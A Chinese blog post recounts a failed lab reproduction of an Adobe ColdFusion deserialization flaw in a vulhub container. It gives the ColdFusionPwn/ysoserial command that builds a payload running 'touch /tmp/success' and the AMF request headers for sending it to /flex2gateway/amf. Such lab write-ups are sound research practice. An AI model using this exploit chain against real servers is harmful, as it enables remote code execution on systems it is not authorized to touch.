微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

Adobe ColdFusion 反序列化漏洞(一次失败的复现)

Adobe ColdFusion 反序列化漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

image-20210403225302538

查看开启的端口号

docker-compose ps

image-20210403225351031

访问http://target_ip:8500/CFIDE/administrator/index.cfm

image-20210403225516506

输入密码vulhub,即可成功安装Adobe ColdFusion

image-20210403225534492

0x02.漏洞复现

我们使用ColdFusionPwn工具来生成POC

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

我执行的时候出现了这样的错误,但kali上可以生成payload

image-20210403231159581

image-20210403231131940

使用past from file来给burp添加payload

文件头如下,要用Content-Type: application/x-amf

POST /flex2gateway/amf HTTP/1.1
Host: target_ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853

[...poc...]

image-20210403231914212

但结果是失败的,总是无法执行命令,希望有大佬解惑

image-20210403231946298

image-20210403231956779

image-20210404105903646

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐